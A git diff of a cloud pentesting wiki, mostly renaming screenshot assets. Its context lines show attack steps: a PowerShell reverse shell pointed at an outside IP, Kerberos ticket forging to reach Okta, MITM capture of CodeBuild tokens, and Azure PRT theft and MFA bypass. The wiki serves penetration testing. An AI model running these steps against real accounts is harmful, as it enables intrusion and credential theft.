diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..d7961cab39 Binary files /dev/null and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png index d7961cab39..ece9585b82 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png index ece9585b82..3048b65efa 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png index 3048b65efa..fb52dbc6cd 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png index fb52dbc6cd..ce50798209 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png index ce50798209..fb5aa4f77c 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png differ 
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png index fb5aa4f77c..0f269bd025 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1).png index 0f269bd025..66bce84492 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png index 66bce84492..cf55c03e28 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png index cf55c03e28..7e59066fb8 100644 Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index 7e59066fb8..a66b921a15 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index a66b921a15..6e6b14ecd4 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..1520310fb4 Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ 
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png index 1520310fb4..d02adb1bc2 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png index d02adb1bc2..2c1380cee8 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png index 2c1380cee8..d0ab10ede3 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png index d0ab10ede3..6c458d0381 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1).png index 6c458d0381..feea4d9138 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1).png index feea4d9138..b57f12f1b5 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png index b57f12f1b5..f282f52114 100644 Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ 
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index f282f52114..0c13369f3d 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 0c13369f3d..4ba6ea2ef1 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..79ded4931f Binary files /dev/null and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png index 79ded4931f..c31faa50d4 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png index c31faa50d4..f2584b8ffc 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1).png index f2584b8ffc..d2bc442169 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png index d2bc442169..0ea673488f 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ 
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png index 0ea673488f..0f975e1051 100644 Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 0f975e1051..082f6e0956 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index 082f6e0956..654ddaa3bf 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..1a81f9de9c Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png index 1a81f9de9c..2712b6af5f 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png index 2712b6af5f..ec1557dd97 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png index ec1557dd97..d68bdcd0ce 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ 
diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png index d68bdcd0ce..66bce84492 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png index 66bce84492..c0aaaf701c 100644 Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index c0aaaf701c..44dbbe0a5d 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 44dbbe0a5d..d7321dae6c 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index d7321dae6c..67281e0416 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/SUMMARY.md b/SUMMARY.md index 71b37247ed..79ee64681c 100644 --- a/SUMMARY.md +++ b/SUMMARY.md 
@@ -76,6 +76,7 @@ * [GCP - AppEngine Privesc](pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-appengine-privesc.md) * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) + * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) * [GCP - Cloudscheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) * [GCP - Compute Privesc](pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md) * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) @@ -115,7 +116,7 @@ * [GCP - SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-sql-enum.md) * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) - * [GCP - IAM, Ppals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) + * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) * [GCP - KMS Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-and-secrets-management-enum.md) * [GCP - Pub/Sub](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-pentesting/gcp-services/gcp-secrets-manager-enum.md) diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md index efe34c6fde..2f66524b09 100644 --- a/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ b/pentesting-ci-cd/gitea-security/basic-gitea-information.md 
@@ -46,7 +46,7 @@ When creating a new team, several important settings are selected: * **Administrator** access * **Specific** access: -![](<../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png>) ### Teams & Users diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md index 646cc1437f..a53661c1f8 100644 --- a/pentesting-ci-cd/okta-security/README.md +++ b/pentesting-ci-cd/okta-security/README.md @@ -64,11 +64,11 @@ getST.py -spn HTTP/clientname.kerberos.okta.com -dc-ip 1.2.3.4 LAB/comprommisedu With a ticket retrieved for the AD user, we need to inject this on a host we control using Rubeus or Mimikatz: -
+
You’ll need to make sure that `clientname.kerberos.okta.com` is added to the “Intranet” security zone in Internet Options. And then, in our browser, if we hit the below URL, we should find that we receive a JSON response providing an `OK` result when the Kerberos ticket is accepted: -
+
Heading over to the Okta dashboard, if everything is OK, you’ll be signed in. @@ -76,7 +76,7 @@ Moreover, if we are able to compromise the actual Okta service account exposing It should be noted that as Okta only support AES for ticket encryption, we’ll need to ensure we have the AES key or plaintext password to authenticate: -
+
To craft our ticket for the victim user of `testuser`, we use: @@ -88,7 +88,7 @@ ticketer.py -domain-sid S-1-5-21-4170871944-1575468979-147100471 -domain lab.loc And again, deliver this to Okta via our browser session: -
+
### Hijacking Okta AD Agent @@ -104,7 +104,7 @@ C:\Program Files (x86)\Okta\Okta AD Agent We’re going to take a look at the `OktaAgentService.exe.config`, which contains a few interesting bits of XML: -
+
The Base64 encoded `AgentToken` is where we set our sights. If we open up `OktaAgentService.exe` in dnSpy, we can see how these values are decrypted: diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md index 7534776b27..de4eecbc8f 100644 --- a/pentesting-ci-cd/travisci-security/README.md +++ b/pentesting-ci-cd/travisci-security/README.md @@ -44,7 +44,7 @@ It looks like It's not possible to set crons inside the `.travis.yml` according TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: -![](<../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ### Dumping Secrets diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md index 949e6ee757..40c738154b 100644 --- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md 
@@ -35,22 +35,24 @@ The Docker image you could use is [https://github.com/carlospolop/docker-mitm](h * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** +2. **Set the environment** + * Create a **new Codebuild project** or **modify** the environment of an existing one. + * Set the project to use the **previously generated Docker image** - * Create a **new Codebuild project** or **modify** the environment of an existing one. - * Set the project to use the **previously generated Docker image** - * +
- ``` -
- ``` 3. **Set the MitM proxy in your host** - * As indicated in the **Github repo** you could use something like: + +* As indicated in the **Github repo** you could use something like: ```bash mitmproxy --listen-port 4444 --allow-hosts "github.com" ``` +{% hint style="success" %} +The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. +{% endhint %} + 4. **Run the build & capture the credentials** * You can see the token in the **Authorization** header: diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md index 479612c01c..1e70287367 100644 --- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md +++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md @@ -106,7 +106,7 @@ aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. {% endhint %} -
+
### Destroy keys diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md index d2c063c9d6..7aa9f6d376 100644 --- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md +++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md @@ -42,7 +42,7 @@ For example, **airflow** could be storing **DAGs** **code** in there, or **web p The following screenshot shows an example of a file that was targeted for a ransomware attack. As you can see, the account ID that owns the KMS key that was used to encrypt the object (7\*\*\*\*\*\*\*\*\*\*2) is different than the account ID of the account that owns the object (2\*\*\*\*\*\*\*\*\*\*1). -![](<../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) Here you can [find a ransomware example](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/s3\_ransomware/s3-ransomware-poc.py) that does the following: diff --git a/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md index 6c537df0fd..7f1382550e 100644 --- a/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +++ b/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md 
@@ -43,11 +43,11 @@ zip 1692777270420-aws-flask-app.zip # Upload code aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip # Rebuild env -aws elasticbeanstalk rebuild-environment --environment-id "env-id" +aws elasticbeanstalk rebuild-environment --environment-name "env-name" ``` {% endcode %} -### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... +### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md index e244eb0887..dcaf2e4d5e 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md @@ -62,7 +62,7 @@ Note that ECR requires that users have **permission** to make calls to the **`ec It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. -
+
First, you need to give the external account access over the registry with a **registry policy** like: diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md index 91e91edae0..7bb038abfa 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md @@ -248,7 +248,7 @@ It's possible to generate API keys in the API Gateway portal and even set how mu To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: -
+
## Unauthenticated Access diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md index b66207fcf9..7354015a77 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md @@ -119,7 +119,7 @@ AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its i Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them {% endhint %} -
+
## Actions diff --git a/pentesting-cloud/azure-security/az-basic-information.md b/pentesting-cloud/azure-security/az-basic-information.md index 3544c112e5..4d1939805b 100644 --- a/pentesting-cloud/azure-security/az-basic-information.md +++ b/pentesting-cloud/azure-security/az-basic-information.md @@ -145,7 +145,7 @@ In Azure **permissions are can be assigned to any part of the hierarchy**. That This hierarchical structure allows for efficient and scalable management of access permissions. -
+
### Azure RBAC vs ABAC diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md index 8b8fc0478f..8db1db142f 100644 --- a/pentesting-cloud/azure-security/az-device-registration.md +++ b/pentesting-cloud/azure-security/az-device-registration.md @@ -62,7 +62,7 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie And then you can register the device: -
+
Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. @@ -78,7 +78,7 @@ This attack was fixed in September 2021 as you can no longer register new device It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info check this [**talk**](https://youtu.be/BduCn8cLV1A). -
+
{% hint style="danger" %} However, this was fixed. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md index 15818d5b7d..43faff51c1 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -46,19 +46,19 @@ The “upgrade” from normal refresh token to primary refresh token is not poss If there is a policy that requires MFA to sign in, we can instead use the `interactiveauth` module: -
+
The resulting refresh token (which is cached in the `.roadtools_auth` file) can be used to request a token for the device registration service, where we can create the device: -
+
Now that we have a device identity, we can combine this with the same refresh token to obtain a PRT (both refresh tokens shortened for readability): -
+
Tokens resulting from the authentication will contain the same authentication method claims as used during the registration, so **any MFA usage will be transferred to the PRT**. The PRT that we get can be used in any authentication flow, so we can expand the scope of our limited refresh token to any possible app. -
+
We can also use this to sign in to browser flows: diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md index 246bd80ed2..6c301e0ceb 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md @@ -55,7 +55,7 @@ roadtx interactiveauth -u myuser@mytenant.com -p password -r devicereg Any of the commands above with **save an access token to the `.roadtools_auth` file**. The device registration command will automatically load it from this file. You can customize what you want for device properties with various commandline parameters to the `roadtx device` module: -
+
We register an Azure AD joined device with the name “blogdevice”: @@ -113,7 +113,7 @@ Tokens were written to .roadtools_auth There’s also other options you can use to specify other resources or the correct redirect URL for the app you are using: -
+
## Selenium based Azure AD authentication @@ -163,7 +163,7 @@ roadtx browserprtinject -u newlowpriv@iminyour.cloud -r msgraph -c msteams The issued access token will contain the `deviceid` claim, which is the device from which we stole the PRT. Since this device is Intune managed and compliant, it passes the compliancy requirement: -
+
### Adding MFA claims to an existing PRT @@ -182,7 +182,7 @@ roadtx prt -r -c blogdevice.pem -k blogdevice.key The new PRT is written to disk and when we use it to request tokens we see the MFA claim: -
+
We can use this PRT to obtain tokens for resources that require MFA using any of the above methods. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md index e916d4b28b..59f639f234 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md @@ -28,11 +28,11 @@ Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, prox ``` {% endcode %} -
+
When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email: -
+
An automatically, this user will be **synced from AzureAD to the on-prem AD user**. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md index 4e872afdd8..d49836276b 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md @@ -43,7 +43,7 @@ The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync It's possible to extract the configuration from one of the tables, being one encrypted: -
+
The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md index 363285e791..31e8cd6cab 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md @@ -60,7 +60,7 @@ The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed Therefore, even if the PTR cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**. -
+
## PRT Abuse Scenarios @@ -286,7 +286,7 @@ roadtx browserprtauth roadtx describe < .roadtools_auth ``` -
+
#### Option 3 - roadrecon using derived keys diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md index 7b317b9d86..834b107e3f 100644 --- a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md +++ b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md @@ -72,7 +72,7 @@ RevPShell -Reverse 40.84.7.73 443 Now we’ll run our configuration file. I have mine setup to be published to the Desktop for a better visual, however it can be published just about anywhere. After a couple of minutes, we’ll see that the reverse-shell script has been published! -
+
### Step 6 — Host Payload and Setup Listener diff --git a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md index e0a7743a7f..44520a025f 100644 --- a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md +++ b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md @@ -213,7 +213,7 @@ az network vnet subnet list --resource-group --vnet-name
+
**Service Endpoints:** diff --git a/pentesting-cloud/azure-security/keyvault.md b/pentesting-cloud/azure-security/keyvault.md index 131b8f5097..4858eb97d2 100644 --- a/pentesting-cloud/azure-security/keyvault.md +++ b/pentesting-cloud/azure-security/keyvault.md @@ -45,7 +45,7 @@ A role like **Contributor** that has permissions in the management place to mana ### Key Vault RBAC Built-In Roles -
+
